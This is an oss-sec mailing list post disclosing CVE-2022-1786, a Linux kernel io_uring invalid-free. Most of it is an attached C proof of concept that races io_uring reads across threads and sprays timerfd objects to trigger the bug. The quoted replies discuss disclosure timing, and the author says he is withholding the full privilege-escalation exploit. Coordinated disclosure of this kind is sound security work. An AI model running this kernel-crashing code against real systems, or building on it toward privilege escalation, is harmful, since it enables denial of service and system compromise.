oss-sec mailing list archives
Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring
From: Kyle Zeng <zengyhkyle () gmail com>
Date: Sat, 28 May 2022 01:26:27 -0700
Hi all,
A minimal crashing PoC for CVE-2022-1786 is attached in the email.
Kyle
=-=-=-=-=-=-=-=
#define _GNU_SOURCE
#include <stdarg.h>
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <pthread.h>
#include <sched.h>
#include <setjmp.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#include <assert.h>
#include <fcntl.h>
#include <linux/fs.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/timerfd.h>
#include <sys/xattr.h>
#include <linux/capability.h>
#include <linux/futex.h>
#include <linux/io_uring.h>
// io_uring tutorial:
#define u64 unsigned long long
#define u32 unsigned int
# ifndef __NR_io_uring_setup
# define __NR_io_uring_setup 425
# endif
# ifndef __NR_io_uring_enter
# define __NR_io_uring_enter 426
# endif
# ifndef __NR_io_uring_register
# define __NR_io_uring_register 427
# endif
int fd_io_uring;
#define GROOM_NUM 0x20
u64 cpu_num = 4;
u64 work_num = 0x200;
char fname[] = "/etc/passwd";
u64 heap_addr;
int target_shmid;
char timerfd_backup[0x100];
#define NAP_TIME1 50000
#define NAP_TIME2 50000
void set_cpu(int cpuid)
{
cpu_set_t my_set;
CPU_ZERO(&my_set);
CPU_SET(cpuid, &my_set);
assert(sched_setaffinity(0, sizeof(my_set), &my_set) == 0);
}
void increase_limit()
{
int ret;
struct rlimit open_file_limit;
/* Query current soft/hard value */
ret = getrlimit(RLIMIT_NOFILE, &open_file_limit);
assert(ret >= 0);
printf("[*] file limit: %d\n", open_file_limit.rlim_max);
/* Set soft limit to hard limit */
open_file_limit.rlim_cur = open_file_limit.rlim_max;
ret = setrlimit(RLIMIT_NOFILE, &open_file_limit);
assert(ret >= 0);
}
struct cq_ring_t {
u32 *head;
u32 *tail;
u32 *ring_mask;
u32 *ring_entries;
struct io_uring_cqe *cqes;
};
struct sq_ring_t {
u32 *head;
u32 *tail;
u32 *ring_mask;
u32 *ring_entries;
u32 *flags;
u32 *array;
};
struct uring_mgr_t {
int fd;
struct sq_ring_t sq_ring;
struct cq_ring_t cq_ring;
struct io_uring_sqe *sqes;
};
#define IORING_OP_WRITE 23
#define IORING_OP_READ 22
struct uring_mgr_t mgr;
void uring_mgr_setup(struct uring_mgr_t *mgr, u32 entries)
{
// create io_uring fd
struct io_uring_params setup_params = {0};
setup_params.flags = IORING_SETUP_IOPOLL;
mgr->fd = syscall(__NR_io_uring_setup, entries, &setup_params);
assert(mgr->fd >= 0);
// map the ring buffer and the SQE(submission queue entry) buffer
uint32_t sq_ring_sz = setup_params.sq_off.array +
setup_params.sq_entries * sizeof(uint32_t);
uint32_t cq_ring_sz = setup_params.cq_off.cqes +
setup_params.cq_entries * sizeof(struct io_uring_cqe);
uint32_t ring_sz = sq_ring_sz > cq_ring_sz ? sq_ring_sz : cq_ring_sz;
uint32_t sqes_sz = setup_params.sq_entries * sizeof(struct
io_uring_sqe);
void *ring_ptr = mmap(NULL, ring_sz, PROT_READ | PROT_WRITE, MAP_SHARED
| MAP_POPULATE,
mgr->fd, IORING_OFF_SQ_RING);
mgr->sqes = (struct io_uring_sqe *) mmap(NULL, sqes_sz, PROT_READ |
PROT_WRITE,
MAP_SHARED | MAP_POPULATE, mgr->fd, IORING_OFF_SQES);
assert((long)mgr->sqes >= 0);
// now initialize the completion queue
struct cq_ring_t *cq_ring = &mgr->cq_ring;
cq_ring->head = (u32 *)((long )ring_ptr + setup_params.cq_off.head);
cq_ring->tail = (u32 *)((long)ring_ptr + setup_params.cq_off.tail);
cq_ring->ring_mask = (u32 *)((long)ring_ptr +
setup_params.cq_off.ring_mask);
cq_ring->ring_entries = (u32 *)((long)ring_ptr +
setup_params.cq_off.ring_entries);
cq_ring->cqes = (struct io_uring_cqe *)((long)ring_ptr +
setup_params.cq_off.cqes);
// now initialize the submission queue
struct sq_ring_t *sq_ring = &mgr->sq_ring;
sq_ring->head = (u32 *)((long)ring_ptr + setup_params.sq_off.head);
sq_ring->tail = (u32 *)((long)ring_ptr + setup_params.sq_off.tail);
sq_ring->ring_mask = (u32 *)((long)ring_ptr +
setup_params.sq_off.ring_mask);
sq_ring->ring_entries = (u32 *)((long)ring_ptr +
setup_params.sq_off.ring_entries);
sq_ring->flags = (u32 *)((long)ring_ptr + setup_params.sq_off.flags);
sq_ring->array = (u32 *)((long)ring_ptr + setup_params.sq_off.array);
}
int *flag;
u64 val;
u64 *val_ptr = &val;
u64 elapse_time[2];
void *func(void *arg) {
int cpuid = (int)(long)arg;
set_cpu(cpuid);
while(*flag == 0);
int ret = syscall(__NR_io_uring_enter, fd_io_uring, work_num/2,
work_num/2, 1);
__atomic_fetch_add(&val, 1, __ATOMIC_SEQ_CST);
}
void trigger_free()
{
uring_mgr_setup(&mgr, work_num);
fd_io_uring = mgr.fd;
printf("fd_io_uring: %d\n", fd_io_uring);
// open some file
// fd = open("/etc/passwd", O_RDONLY|O_NONBLOCK|O_DIRECT|O_SYNC);
int fds[work_num];
puts(fname);
for(int i=0; i<work_num; i++) {
fds[i] = open(fname, O_RDONLY|O_NONBLOCK|O_DIRECT|O_SYNC);
assert(fds[i] >= 0);
}
printf("fd: %d\n", fds[0]);
assert(fds[0] >= 0);
// SQE: submission queue entries
// struct io_uring_sqe sqe = {
// .opcode = IORING_OP_WRITE,
// .flags = 0,
// .ioprio = 0,
// .fd = fd,
// .off = 0,
// .addr = 0,
// .len = 1,
// };
void *buf = mmap(NULL, 0x5000000, PROT_READ|PROT_WRITE,
MAP_ANON|MAP_PRIVATE, -1, 0);
memset(buf, 'A', 0x5000000);
struct io_uring_sqe sqe = {
.opcode = IORING_OP_READ,
.flags = 0,
.ioprio = 0,
.fd = -1,
.off = 0,
.addr = (u64)buf,
.len = 0x5000000,
};
// now submit the request
struct sq_ring_t *sq_ring = &mgr.sq_ring;
struct cq_ring_t *cq_ring = &mgr.cq_ring;
u32 index, tail, next_tail;
next_tail = tail = *sq_ring->tail;
next_tail++;
// barrier();
// copy the request to the sqe buffer
index = tail & *mgr.sq_ring.ring_mask;
for(int i=0; i<work_num; i++) {
sqe.fd = fds[i];
memcpy(&mgr.sqes[index+i], &sqe, sizeof(struct io_uring_sqe));
}
sq_ring->array[index] = index;
tail = next_tail;
assert(*sq_ring->tail != tail);
*sq_ring->tail = work_num;
set_cpu(2);
pthread_t tids[2];
int ret;
for(int i=0; i<2; i++) {
ret = pthread_create(&tids[i], NULL, func, i);
assert(ret == 0);
}
*flag = 1;
// sleep(1);
while(*val_ptr != 2);
pthread_join(tids[0], NULL);
pthread_join(tids[1], NULL);
// sleep(1000);
execve("/", NULL, NULL);
close(fd_io_uring);
exit(0);
}
void attempt()
{
flag = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANON, -1, 0);
if(!fork()) {
trigger_free();
} else {
wait(NULL);
for(int i=0; i<0x100; i++) timerfd_create(CLOCK_REALTIME, 0);
}
}
int main() {
puts("========================================================================");
increase_limit();
set_cpu(0);
for(int i=0; i<10000; i++) {
printf("i: %d\n", i);
usleep(10000);
if(!fork()) attempt();
else {
wait(NULL);
}
}
puts("Done");
}
=-=-=-=-=-=-=-=
On Tue, May 24, 2022 at 9:28 AM Kyle Zeng <zengyhkyle () gmail com> wrote:
A small correction, I shared a minimal crashing PoC to linux-distros but not the LPE exploit. I do not plan to share the LPE exploit because of ethical issues. To answer your question: I intend to post the crashing PoC on May 27th. Thanks for reminding me. Kyle On Tue, May 24, 2022 at 9:22 AM Solar Designer <solar () openwall com> wrote:On Tue, May 24, 2022 at 09:10:37AM -0700, Kyle Zeng wrote:# Impact I wrote a proof-of-concept exploit and demonstrated that it can be used to achieve local privilege escalation.Since you shared the PoC exploit with linux-distros, you're supposed to also post that to oss-security within 7 days of your first posting above, so by or on May 31. Do you intend to, and when exactly? Alexander
Current thread:
- CVE-2022-1786: Linux Kernel invalid-free in io_uring Kyle Zeng (May 24)
- Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring Solar Designer (May 24)
- Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring Kyle Zeng (May 24)
- Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring Kyle Zeng (May 28)
- Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring Kyle Zeng (May 24)
- Re: CVE-2022-1786: Linux Kernel invalid-free in io_uring Solar Designer (May 24)
